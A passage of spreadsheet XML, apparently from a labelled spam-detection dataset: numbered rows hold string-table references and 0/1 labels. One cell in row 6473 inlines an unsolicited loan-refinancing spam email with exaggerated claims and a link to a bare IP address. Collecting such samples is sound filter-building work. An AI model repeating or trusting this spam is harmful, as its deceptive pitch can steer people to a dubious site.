      </c>
    </row>
    <row r="6428" hidden="1">
      <c r="A6428" s="1">
        <v>6426.0</v>
      </c>
      <c r="B6428" s="1" t="s">
        <v>4208</v>
      </c>
      <c r="C6428" s="1" t="s">
        <v>4209</v>
      </c>
      <c r="D6428" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6429" hidden="1">
      <c r="A6429" s="1">
        <v>6427.0</v>
      </c>
      <c r="B6429" s="1" t="s">
        <v>1183</v>
      </c>
      <c r="C6429" s="1" t="s">
        <v>5795</v>
      </c>
      <c r="D6429" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6430" hidden="1">
      <c r="A6430" s="1">
        <v>6428.0</v>
      </c>
      <c r="B6430" s="1" t="s">
        <v>897</v>
      </c>
      <c r="C6430" s="1" t="s">
        <v>898</v>
      </c>
      <c r="D6430" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6431" hidden="1">
      <c r="A6431" s="1">
        <v>6429.0</v>
      </c>
      <c r="B6431" s="1" t="s">
        <v>8414</v>
      </c>
      <c r="C6431" s="1" t="s">
        <v>8415</v>
      </c>
      <c r="D6431" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6432" hidden="1">
      <c r="A6432" s="1">
        <v>6430.0</v>
      </c>
      <c r="B6432" s="1" t="s">
        <v>1407</v>
      </c>
      <c r="C6432" s="1" t="s">
        <v>7755</v>
      </c>
      <c r="D6432" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6433" hidden="1">
      <c r="A6433" s="1">
        <v>6431.0</v>
      </c>
      <c r="B6433" s="1" t="s">
        <v>8416</v>
      </c>
      <c r="C6433" s="1" t="s">
        <v>8417</v>
      </c>
      <c r="D6433" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6434" hidden="1">
      <c r="A6434" s="1">
        <v>6432.0</v>
      </c>
      <c r="B6434" s="1" t="s">
        <v>6341</v>
      </c>
      <c r="C6434" s="1" t="s">
        <v>6342</v>
      </c>
      <c r="D6434" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6435">
      <c r="A6435" s="1">
        <v>6433.0</v>
      </c>
      <c r="B6435" s="1" t="s">
        <v>7057</v>
      </c>
      <c r="C6435" s="1" t="s">
        <v>8418</v>
      </c>
      <c r="D6435" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6436" hidden="1">
      <c r="A6436" s="1">
        <v>6434.0</v>
      </c>
      <c r="B6436" s="1" t="s">
        <v>8419</v>
      </c>
      <c r="C6436" s="1" t="s">
        <v>8420</v>
      </c>
      <c r="D6436" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6437" hidden="1">
      <c r="A6437" s="1">
        <v>6435.0</v>
      </c>
      <c r="B6437" s="1" t="s">
        <v>655</v>
      </c>
      <c r="C6437" s="1" t="s">
        <v>8421</v>
      </c>
      <c r="D6437" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6438" hidden="1">
      <c r="A6438" s="1">
        <v>6436.0</v>
      </c>
      <c r="B6438" s="1" t="s">
        <v>902</v>
      </c>
      <c r="C6438" s="1" t="s">
        <v>7795</v>
      </c>
      <c r="D6438" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6439" hidden="1">
      <c r="A6439" s="1">
        <v>6437.0</v>
      </c>
      <c r="B6439" s="1" t="s">
        <v>8422</v>
      </c>
      <c r="C6439" s="1" t="s">
        <v>8423</v>
      </c>
      <c r="D6439" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6440" hidden="1">
      <c r="A6440" s="1">
        <v>6438.0</v>
      </c>
      <c r="B6440" s="1" t="s">
        <v>495</v>
      </c>
      <c r="C6440" s="1" t="s">
        <v>6897</v>
      </c>
      <c r="D6440" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6441" hidden="1">
      <c r="A6441" s="1">
        <v>6439.0</v>
      </c>
      <c r="B6441" s="1" t="s">
        <v>2782</v>
      </c>
      <c r="C6441" s="1" t="s">
        <v>2783</v>
      </c>
      <c r="D6441" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6442" hidden="1">
      <c r="A6442" s="1">
        <v>6440.0</v>
      </c>
      <c r="B6442" s="1" t="s">
        <v>8424</v>
      </c>
      <c r="C6442" s="1" t="s">
        <v>8425</v>
      </c>
      <c r="D6442" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6443" hidden="1">
      <c r="A6443" s="1">
        <v>6441.0</v>
      </c>
      <c r="B6443" s="1" t="s">
        <v>8426</v>
      </c>
      <c r="C6443" s="1" t="s">
        <v>8427</v>
      </c>
      <c r="D6443" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6444">
      <c r="A6444" s="1">
        <v>6442.0</v>
      </c>
      <c r="B6444" s="1" t="s">
        <v>8428</v>
      </c>
      <c r="C6444" s="1" t="s">
        <v>8429</v>
      </c>
      <c r="D6444" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6445" hidden="1">
      <c r="A6445" s="1">
        <v>6443.0</v>
      </c>
      <c r="B6445" s="1" t="s">
        <v>8430</v>
      </c>
      <c r="C6445" s="1" t="s">
        <v>8431</v>
      </c>
      <c r="D6445" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6446" hidden="1">
      <c r="A6446" s="1">
        <v>6444.0</v>
      </c>
      <c r="B6446" s="1" t="s">
        <v>3018</v>
      </c>
      <c r="C6446" s="1" t="s">
        <v>3019</v>
      </c>
      <c r="D6446" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6447" hidden="1">
      <c r="A6447" s="1">
        <v>6445.0</v>
      </c>
      <c r="B6447" s="1" t="s">
        <v>6939</v>
      </c>
      <c r="C6447" s="1" t="s">
        <v>8432</v>
      </c>
      <c r="D6447" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6448" hidden="1">
      <c r="A6448" s="1">
        <v>6446.0</v>
      </c>
      <c r="B6448" s="1" t="s">
        <v>2415</v>
      </c>
      <c r="C6448" s="1" t="s">
        <v>8433</v>
      </c>
      <c r="D6448" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6449">
      <c r="A6449" s="1">
        <v>6447.0</v>
      </c>
      <c r="B6449" s="1" t="s">
        <v>8434</v>
      </c>
      <c r="C6449" s="1" t="s">
        <v>8435</v>
      </c>
      <c r="D6449" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6450">
      <c r="A6450" s="1">
        <v>6448.0</v>
      </c>
      <c r="B6450" s="1" t="s">
        <v>4799</v>
      </c>
      <c r="C6450" s="1" t="s">
        <v>4800</v>
      </c>
      <c r="D6450" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6451">
      <c r="A6451" s="1">
        <v>6449.0</v>
      </c>
      <c r="B6451" s="1" t="s">
        <v>7825</v>
      </c>
      <c r="C6451" s="1" t="s">
        <v>7826</v>
      </c>
      <c r="D6451" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6452" hidden="1">
      <c r="A6452" s="1">
        <v>6450.0</v>
      </c>
      <c r="B6452" s="1" t="s">
        <v>6973</v>
      </c>
      <c r="C6452" s="1" t="s">
        <v>6974</v>
      </c>
      <c r="D6452" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6453" hidden="1">
      <c r="A6453" s="1">
        <v>6451.0</v>
      </c>
      <c r="B6453" s="1" t="s">
        <v>1558</v>
      </c>
      <c r="C6453" s="1" t="s">
        <v>6958</v>
      </c>
      <c r="D6453" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6454" hidden="1">
      <c r="A6454" s="1">
        <v>6452.0</v>
      </c>
      <c r="B6454" s="1" t="s">
        <v>1995</v>
      </c>
      <c r="C6454" s="1" t="s">
        <v>8436</v>
      </c>
      <c r="D6454" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6455" hidden="1">
      <c r="A6455" s="1">
        <v>6453.0</v>
      </c>
      <c r="B6455" s="1" t="s">
        <v>8437</v>
      </c>
      <c r="C6455" s="1" t="s">
        <v>8438</v>
      </c>
      <c r="D6455" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6456" hidden="1">
      <c r="A6456" s="1">
        <v>6454.0</v>
      </c>
      <c r="B6456" s="1" t="s">
        <v>601</v>
      </c>
      <c r="C6456" s="1" t="s">
        <v>602</v>
      </c>
      <c r="D6456" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6457" hidden="1">
      <c r="A6457" s="1">
        <v>6455.0</v>
      </c>
      <c r="B6457" s="1" t="s">
        <v>3506</v>
      </c>
      <c r="C6457" s="1" t="s">
        <v>3507</v>
      </c>
      <c r="D6457" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6458">
      <c r="A6458" s="1">
        <v>6456.0</v>
      </c>
      <c r="B6458" s="1" t="s">
        <v>8439</v>
      </c>
      <c r="C6458" s="1" t="s">
        <v>8440</v>
      </c>
      <c r="D6458" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6459" hidden="1">
      <c r="A6459" s="1">
        <v>6457.0</v>
      </c>
      <c r="B6459" s="1" t="s">
        <v>1353</v>
      </c>
      <c r="C6459" s="1" t="s">
        <v>1354</v>
      </c>
      <c r="D6459" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6460">
      <c r="A6460" s="1">
        <v>6458.0</v>
      </c>
      <c r="B6460" s="1" t="s">
        <v>8441</v>
      </c>
      <c r="C6460" s="1" t="s">
        <v>8442</v>
      </c>
      <c r="D6460" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6461" hidden="1">
      <c r="A6461" s="1">
        <v>6459.0</v>
      </c>
      <c r="B6461" s="1" t="s">
        <v>5060</v>
      </c>
      <c r="C6461" s="1" t="s">
        <v>6421</v>
      </c>
      <c r="D6461" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6462">
      <c r="A6462" s="1">
        <v>6460.0</v>
      </c>
      <c r="B6462" s="1" t="s">
        <v>8443</v>
      </c>
      <c r="C6462" s="1" t="s">
        <v>8444</v>
      </c>
      <c r="D6462" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6463" hidden="1">
      <c r="A6463" s="1">
        <v>6461.0</v>
      </c>
      <c r="B6463" s="1" t="s">
        <v>1814</v>
      </c>
      <c r="C6463" s="1" t="s">
        <v>8445</v>
      </c>
      <c r="D6463" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6464" hidden="1">
      <c r="A6464" s="1">
        <v>6462.0</v>
      </c>
      <c r="B6464" s="1" t="s">
        <v>8446</v>
      </c>
      <c r="C6464" s="1" t="s">
        <v>8447</v>
      </c>
      <c r="D6464" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6465" hidden="1">
      <c r="A6465" s="1">
        <v>6463.0</v>
      </c>
      <c r="B6465" s="1" t="s">
        <v>261</v>
      </c>
      <c r="C6465" s="1" t="s">
        <v>8448</v>
      </c>
      <c r="D6465" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6466" hidden="1">
      <c r="A6466" s="1">
        <v>6464.0</v>
      </c>
      <c r="B6466" s="1" t="s">
        <v>6921</v>
      </c>
      <c r="C6466" s="1" t="s">
        <v>6922</v>
      </c>
      <c r="D6466" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6467">
      <c r="A6467" s="1">
        <v>6465.0</v>
      </c>
      <c r="B6467" s="1" t="s">
        <v>8449</v>
      </c>
      <c r="C6467" s="1" t="s">
        <v>8450</v>
      </c>
      <c r="D6467" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6468">
      <c r="A6468" s="1">
        <v>6466.0</v>
      </c>
      <c r="B6468" s="1" t="s">
        <v>5217</v>
      </c>
      <c r="C6468" s="1" t="s">
        <v>5218</v>
      </c>
      <c r="D6468" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6469">
      <c r="A6469" s="1">
        <v>6467.0</v>
      </c>
      <c r="B6469" s="1" t="s">
        <v>8451</v>
      </c>
      <c r="C6469" s="1" t="s">
        <v>6723</v>
      </c>
      <c r="D6469" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6470">
      <c r="A6470" s="1">
        <v>6468.0</v>
      </c>
      <c r="B6470" s="1" t="s">
        <v>8452</v>
      </c>
      <c r="C6470" s="1" t="s">
        <v>8453</v>
      </c>
      <c r="D6470" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6471" hidden="1">
      <c r="A6471" s="1">
        <v>6469.0</v>
      </c>
      <c r="B6471" s="1" t="s">
        <v>1684</v>
      </c>
      <c r="C6471" s="1" t="s">
        <v>6434</v>
      </c>
      <c r="D6471" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6472" hidden="1">
      <c r="A6472" s="1">
        <v>6470.0</v>
      </c>
      <c r="B6472" s="1" t="s">
        <v>1912</v>
      </c>
      <c r="C6472" s="1" t="s">
        <v>1913</v>
      </c>
      <c r="D6472" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6473">
      <c r="A6473" s="1">
        <v>6471.0</v>
      </c>
      <c r="B6473" s="1" t="s">
        <v>8454</v>
      </c>
      <c r="C6473" s="3" t="str">
        <f>=======================================================
 Now you can have HUNDREDS of lenders compete for your loan!
 FACT: Interest Rates are at their lowest point in 40 years!
 You're eligible even with less than perfect credit !!
 	* Refinancing
 	* New Home Loans
 	* Debt Consolidation
 	* Debt Consultation
 	* Auto Loans
 	* Credit Cards
 	* Student Loans
 	* Second Mortgage
 	* Home Equity
 This Service is 100% FREE without any obligation.
 Visit Our Web Site at:  http://61.129.68.19/user0201/index.asp?Afft=QM3
 =========================================================
 To Unsubscribe: http://61.129.68.19/light/watch.asp
 --DeathToSpamDeathToSpamDeathToSpam--
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Spamassassin-Sightings mailing list
 Spamassassin-Sightings@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-sightings
</f>
        <v>#ERROR!</v>
      </c>
      <c r="D6473" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6474">
      <c r="A6474" s="1">
        <v>6472.0</v>
      </c>
      <c r="B6474" s="1" t="s">
        <v>5326</v>
      </c>
      <c r="C6474" s="1" t="s">
        <v>8455</v>
      </c>
      <c r="D6474" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6475" hidden="1">
      <c r="A6475" s="1">
        <v>6473.0</v>
      </c>
      <c r="B6475" s="1" t="s">
        <v>8456</v>
      </c>
      <c r="C6475" s="1" t="s">
        <v>8457</v>
      </c>
      <c r="D6475" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6476">
      <c r="A6476" s="1">
        <v>6474.0</v>
      </c>
      <c r="B6476" s="1" t="s">
        <v>2768</v>
      </c>
      <c r="C6476" s="1" t="s">
        <v>2922</v>
      </c>
      <c r="D6476" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6477" hidden="1">
      <c r="A6477" s="1">
        <v>6475.0</v>
      </c>
      <c r="B6477" s="1" t="s">
        <v>8458</v>
      </c>
      <c r="C6477" s="1" t="s">
        <v>8459</v>
      </c>
      <c r="D6477" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6478" hidden="1">
      <c r="A6478" s="1">
        <v>6476.0</v>
      </c>
      <c r="B6478" s="1" t="s">
        <v>2794</v>
      </c>
      <c r="C6478" s="1" t="s">
        <v>8460</v>
      </c>
      <c r="D6478" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6479">
      <c r="A6479" s="1">
        <v>6477.0</v>
      </c>
      <c r="B6479" s="1" t="s">
        <v>8461</v>
      </c>
      <c r="C6479" s="1" t="s">
        <v>8462</v>
      </c>
      <c r="D6479" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6480">
      <c r="A6480" s="1">
        <v>6478.0</v>
      </c>
      <c r="B6480" s="1" t="s">
        <v>8463</v>
      </c>
      <c r="C6480" s="1" t="s">
        <v>8464</v>
      </c>
      <c r="D6480" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6481">
      <c r="A6481" s="1">
        <v>6479.0</v>
      </c>
      <c r="B6481" s="1" t="s">
        <v>8465</v>
      </c>
      <c r="C6481" s="1" t="s">
        <v>8466</v>
      </c>
      <c r="D6481" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6482" hidden="1">
      <c r="A6482" s="1">
        <v>6480.0</v>
      </c>
      <c r="B6482" s="1" t="s">
        <v>1227</v>
      </c>
      <c r="C6482" s="1" t="s">
        <v>1661</v>
      </c>
      <c r="D6482" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6483" hidden="1">
      <c r="A6483" s="1">
        <v>6481.0</v>
      </c>
      <c r="B6483" s="1" t="s">
        <v>6310</v>
      </c>
      <c r="C6483" s="1" t="s">
        <v>6311</v>
      </c>
      <c r="D6483" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6484" hidden="1">
      <c r="A6484" s="1">
        <v>6482.0</v>
      </c>
      <c r="B6484" s="1" t="s">
        <v>8467</v>
      </c>
      <c r="C6484" s="1" t="s">
        <v>8468</v>
      </c>
      <c r="D6484" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6485">
      <c r="A6485" s="1">
        <v>6483.0</v>
      </c>
      <c r="B6485" s="1" t="s">
        <v>8469</v>
      </c>
      <c r="C6485" s="1" t="s">
        <v>8470</v>
      </c>
      <c r="D6485" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6486" hidden="1">
      <c r="A6486" s="1">
        <v>6484.0</v>
      </c>
      <c r="B6486" s="1" t="s">
        <v>6137</v>
      </c>
      <c r="C6486" s="1" t="s">
        <v>6138</v>
      </c>
      <c r="D6486" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6487" hidden="1">
      <c r="A6487" s="1">
        <v>6485.0</v>
      </c>
      <c r="B6487" s="1" t="s">
        <v>5590</v>
      </c>
      <c r="C6487" s="1" t="s">
        <v>7228</v>
      </c>
      <c r="D6487" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6488" hidden="1">
      <c r="A6488" s="1">
        <v>6486.0</v>
      </c>
      <c r="B6488" s="1" t="s">
        <v>6831</v>
      </c>
      <c r="C6488" s="1" t="s">
        <v>6832</v>
      </c>
      <c r="D6488" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6489" hidden="1">
      <c r="A6489" s="1">
        <v>6487.0</v>
      </c>
      <c r="B6489" s="1" t="s">
        <v>3567</v>
      </c>
      <c r="C6489" s="1" t="s">
        <v>7640</v>
      </c>
      <c r="D6489" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6490" hidden="1">
      <c r="A6490" s="1">
        <v>6488.0</v>
      </c>
      <c r="B6490" s="1" t="s">
        <v>3274</v>
      </c>
      <c r="C6490" s="1" t="s">
        <v>3275</v>
      </c>
      <c r="D6490" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6491" hidden="1">
      <c r="A6491" s="1">
        <v>6489.0</v>
      </c>
      <c r="B6491" s="1" t="s">
        <v>8471</v>
      </c>
      <c r="C6491" s="1" t="s">
        <v>8472</v>
      </c>
      <c r="D6491" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6492" hidden="1">
      <c r="A6492" s="1">
        <v>6490.0</v>
      </c>
      <c r="B6492" s="1" t="s">
        <v>3769</v>
      </c>
      <c r="C6492" s="1" t="s">
        <v>8473</v>
      </c>
      <c r="D6492" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6493">
      <c r="A6493" s="1">
        <v>6491.0</v>
      </c>
      <c r="B6493" s="1" t="s">
        <v>1506</v>
      </c>
      <c r="C6493" s="1" t="s">
        <v>3879</v>
      </c>
      <c r="D6493" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6494" hidden="1">
      <c r="A6494" s="1">
        <v>6492.0</v>
      </c>
      <c r="B6494" s="1" t="s">
        <v>8474</v>
      </c>
      <c r="C6494" s="1" t="s">
        <v>8475</v>
      </c>
      <c r="D6494" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6495">
      <c r="A6495" s="1">
        <v>6493.0</v>
      </c>
      <c r="B6495" s="1" t="s">
        <v>8476</v>
      </c>
      <c r="C6495" s="1" t="s">
        <v>8477</v>
      </c>
      <c r="D6495" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6496" hidden="1">
      <c r="A6496" s="1">
        <v>6494.0</v>
      </c>
      <c r="B6496" s="1" t="s">
        <v>7356</v>
      </c>
      <c r="C6496" s="1" t="s">
        <v>7357</v>
      </c>
      <c r="D6496" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6497" hidden="1">
      <c r="A6497" s="1">
        <v>6495.0</v>
      </c>
      <c r="B6497" s="1" t="s">
        <v>5720</v>
      </c>
      <c r="C6497" s="1" t="s">
        <v>5721</v>
      </c>
      <c r="D6497" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6498">
      <c r="A6498" s="1">
        <v>6496.0</v>
      </c>
      <c r="B6498" s="1" t="s">
        <v>4310</v>
      </c>
      <c r="C6498" s="1" t="s">
        <v>4664</v>
      </c>
      <c r="D6498" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6499" hidden="1">
      <c r="A6499" s="1">
        <v>6497.0</v>
      </c>
      <c r="B6499" s="1" t="s">
        <v>6540</v>
      </c>
      <c r="C6499" s="1" t="s">
        <v>6541</v>
      </c>
      <c r="D6499" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6500" hidden="1">
      <c r="A6500" s="1">
        <v>6498.0</v>
      </c>
      <c r="B6500" s="1" t="s">
        <v>1122</v>
      </c>
      <c r="C6500" s="1" t="s">
        <v>1123</v>
      </c>
      <c r="D6500" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6501" hidden="1">
      <c r="A6501" s="1">
        <v>6499.0</v>
      </c>
      <c r="B6501" s="1" t="s">
        <v>1120</v>
      </c>
      <c r="C6501" s="1" t="s">
        <v>3146</v>
      </c>
      <c r="D6501" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6502" hidden="1">
      <c r="A6502" s="1">
        <v>6500.0</v>
      </c>
      <c r="B6502" s="1" t="s">
        <v>8478</v>
      </c>
      <c r="C6502" s="1" t="s">
        <v>8479</v>
      </c>
      <c r="D6502" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6503" hidden="1">
      <c r="A6503" s="1">
        <v>6501.0</v>
      </c>
      <c r="B6503" s="1" t="s">
        <v>7808</v>
      </c>
      <c r="C6503" s="1" t="s">
        <v>7809</v>
      </c>
      <c r="D6503" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6504" hidden="1">
      <c r="A6504" s="1">
        <v>6502.0</v>
      </c>
      <c r="B6504" s="1" t="s">
        <v>1477</v>
      </c>
      <c r="C6504" s="1" t="s">
        <v>8333</v>
      </c>
      <c r="D6504" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6505" hidden="1">
      <c r="A6505" s="1">
        <v>6503.0</v>
      </c>
      <c r="B6505" s="1" t="s">
        <v>3843</v>
      </c>
      <c r="C6505" s="1" t="s">
        <v>3844</v>
      </c>
      <c r="D6505" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6506">
      <c r="A6506" s="1">
        <v>6504.0</v>
      </c>
      <c r="B6506" s="1" t="s">
        <v>8480</v>
      </c>
      <c r="C6506" s="1" t="s">
        <v>8481</v>
      </c>
      <c r="D6506" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6507" hidden="1">
      <c r="A6507" s="1">
        <v>6505.0</v>
      </c>
      <c r="B6507" s="1" t="s">
        <v>3163</v>
      </c>
      <c r="C6507" s="1" t="s">
        <v>7746</v>
      </c>
      <c r="D6507" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6508">
      <c r="A6508" s="1">
        <v>6506.0</v>
      </c>
      <c r="B6508" s="1" t="s">
        <v>8482</v>
      </c>
      <c r="C6508" s="1" t="s">
        <v>8483</v>
      </c>
      <c r="D6508" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6509" hidden="1">
      <c r="A6509" s="1">
        <v>6507.0</v>
      </c>
      <c r="B6509" s="1" t="s">
        <v>387</v>
      </c>
      <c r="C6509" s="1" t="s">
        <v>8484</v>
      </c>
      <c r="D6509" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6510">
      <c r="A6510" s="1">
        <v>6508.0</v>
      </c>
      <c r="B6510" s="1" t="s">
        <v>8485</v>
      </c>
      <c r="C6510" s="1" t="s">
        <v>8486</v>
      </c>
      <c r="D6510" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6511" hidden="1">
      <c r="A6511" s="1">
        <v>6509.0</v>
      </c>
      <c r="B6511" s="1" t="s">
        <v>8487</v>
      </c>
      <c r="C6511" s="1" t="s">
        <v>8488</v>
      </c>
      <c r="D6511" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6512" hidden="1">
      <c r="A6512" s="1">
        <v>6510.0</v>
      </c>
      <c r="B6512" s="1" t="s">
        <v>1116</v>
      </c>
      <c r="C6512" s="1" t="s">
        <v>6825</v>
      </c>
      <c r="D6512" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6513" hidden="1">
      <c r="A6513" s="1">
        <v>6511.0</v>
      </c>
      <c r="B6513" s="1" t="s">
        <v>2432</v>
      </c>
      <c r="C6513" s="1" t="s">
        <v>2433</v>
      </c>
      <c r="D6513" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6514" hidden="1">
      <c r="A6514" s="1">
        <v>6512.0</v>
      </c>
      <c r="B6514" s="1" t="s">
        <v>533</v>
      </c>
      <c r="C6514" s="1" t="s">
        <v>3483</v>
      </c>
      <c r="D6514" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6515">
      <c r="A6515" s="1">
        <v>6513.0</v>
      </c>
      <c r="B6515" s="1" t="s">
        <v>5538</v>
      </c>
      <c r="C6515" s="1" t="s">
        <v>5539</v>
      </c>
      <c r="D6515" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6516" hidden="1">
      <c r="A6516" s="1">
        <v>6514.0</v>
      </c>
      <c r="B6516" s="1" t="s">
        <v>1027</v>
      </c>
      <c r="C6516" s="1" t="s">
        <v>8489</v>
      </c>
      <c r="D6516" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6517">
      <c r="A6517" s="1">
        <v>6515.0</v>
      </c>
      <c r="B6517" s="1" t="s">
        <v>8490</v>
      </c>
      <c r="C6517" s="1" t="s">
        <v>8491</v>
      </c>
      <c r="D6517" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6518">
      <c r="A6518" s="1">
        <v>6516.0</v>
      </c>
      <c r="B6518" s="1" t="s">
        <v>8492</v>
      </c>
      <c r="C6518" s="1" t="s">
        <v>8493</v>
      </c>
      <c r="D6518" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6519" hidden="1">
      <c r="A6519" s="1">
        <v>6517.0</v>
      </c>
      <c r="B6519" s="1" t="s">
        <v>8494</v>
      </c>
      <c r="C6519" s="1" t="s">
        <v>8495</v>
      </c>
      <c r="D6519" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6520" hidden="1">
      <c r="A6520" s="1">
        <v>6518.0</v>
      </c>
      <c r="B6520" s="1" t="s">
        <v>803</v>
      </c>
      <c r="C6520" s="1" t="s">
        <v>8496</v>
      </c>
      <c r="D6520" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6521">
      <c r="A6521" s="1">
        <v>6519.0</v>
      </c>
      <c r="B6521" s="1" t="s">
        <v>8497</v>
      </c>
      <c r="C6521" s="1" t="s">
        <v>8498</v>
      </c>
      <c r="D6521" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6522" hidden="1">
      <c r="A6522" s="1">
        <v>6520.0</v>
      </c>
      <c r="B6522" s="1" t="s">
        <v>8499</v>
      </c>
      <c r="C6522" s="1" t="s">
        <v>8500</v>
      </c>
      <c r="D6522" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6523">
      <c r="A6523" s="1">
        <v>6521.0</v>
      </c>
      <c r="B6523" s="1" t="s">
        <v>1062</v>
      </c>
      <c r="C6523" s="1" t="s">
        <v>1063</v>
      </c>
      <c r="D6523" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6524" hidden="1">
      <c r="A6524" s="1">
        <v>6522.0</v>
      </c>
      <c r="B6524" s="1" t="s">
        <v>1027</v>
      </c>
      <c r="C6524" s="1" t="s">
        <v>8501</v>
      </c>
      <c r="D6524" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6525" hidden="1">
      <c r="A6525" s="1">
        <v>6523.0</v>
      </c>
      <c r="B6525" s="1" t="s">
        <v>5588</v>
      </c>
      <c r="C6525" s="1" t="s">
        <v>5589</v>
      </c>
      <c r="D6525" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6526" hidden="1">
      <c r="A6526" s="1">
        <v>6524.0</v>
      </c>
      <c r="B6526" s="1" t="s">
        <v>476</v>
      </c>
      <c r="C6526" s="1" t="s">
        <v>8502</v>
      </c>
      <c r="D6526" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6527" hidden="1">
      <c r="A6527" s="1">
        <v>6525.0</v>
      </c>
      <c r="B6527" s="1" t="s">
        <v>232</v>
      </c>
      <c r="C6527" s="1" t="s">
        <v>2369</v>
      </c>
      <c r="D6527" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6528">
      <c r="A6528" s="1">
        <v>6526.0</v>
      </c>
